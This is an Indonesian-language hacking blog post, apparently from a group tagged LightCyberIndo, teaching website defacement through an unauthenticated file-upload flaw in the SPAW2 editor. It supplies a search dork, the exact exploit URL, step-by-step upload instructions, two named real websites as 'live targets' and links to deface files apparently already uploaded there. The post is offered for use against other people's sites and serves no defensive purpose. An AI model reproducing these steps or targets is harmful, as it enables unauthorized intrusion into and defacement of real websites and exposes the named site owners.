Deface Spaw Upload Vulnerability


Bahan-bahan :
1. HP/PC
2. Kuota (wajib)
3. Jembud (wajib)
4. Dork :

** inurl:"spaw2/upload/files/"

5. Script deface.

** ext : .txt / .html

6. Exploit :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Langkah-langkah :
1. Dorking lah njink kek biasa.

2. Jika udah nemu masukkan exploit nya, seperti dibawah.

www.xnxx.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

atau

www.xnxx.com/[path]/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
"vuln"


3. Cari tulisan image, pencet, rubah jadi file.
"pilih Files"


4. Kemudia pilih file, upload.

5. Cari filenya, cari tulisan "download file"



6. Pencet tuh, auto ke tab baru..

Udah deh, kelar..

Live Target
1. http://www.leanimages.net/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

2. https://www.fem.gr/input/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Hasil?
1. https://www.fem.gr/input/spaw2/uploads/files/duar.txt

2. https://www.leanimages.net/admin/spaw2/uploads/files/vvibu.html

#LightCyberIndo
#penulis_./Misetya

Post a Comment

5 Comments